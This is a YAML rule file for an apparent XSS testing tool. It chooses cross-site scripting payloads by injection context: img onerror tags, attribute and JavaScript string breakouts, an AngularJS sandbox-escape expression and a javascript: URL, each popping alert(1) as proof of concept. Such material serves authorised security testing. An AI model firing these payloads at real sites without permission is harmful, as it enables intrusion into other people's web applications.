name: XSS Decision Engine

rules:

  - if: reflected == True
    then: reflection

  - if: context == "html" and escaped == False
    then: html

  - if: context == "attr" and escaped == False
    then: attr

  - if: context == "js"
    then: js

  - if: context == "template"
    then: angular

  - if: context == "url"
    then: url

  - if: escaped == True
    then: blocked

  - if: reflected == False
    then: dom


actions:

  reflection:
    info:
      - Input is reflected → XSS possible

  html:
    payloads:
      - "<img src=x onerror=alert(1)>"
      - "</tag><img src=x onerror=alert(1)>"

  attr:
    payloads:
      - "\"><img src=x onerror=alert(1)>"

  js:
    payloads:
      - "';alert(1);//"
      - "'-alert(1)-'"

  angular:
    probes:
      - "{{7*7}}"
    payloads:
      - "{{$on.constructor('alert(1)')()}}"

  url:
    payloads:
      - "javascript:alert(1)"

  blocked:
    info:
      - Input is escaped → find DOM sink

  dom:
    info:
      - Check innerHTML, document.write, jQuery
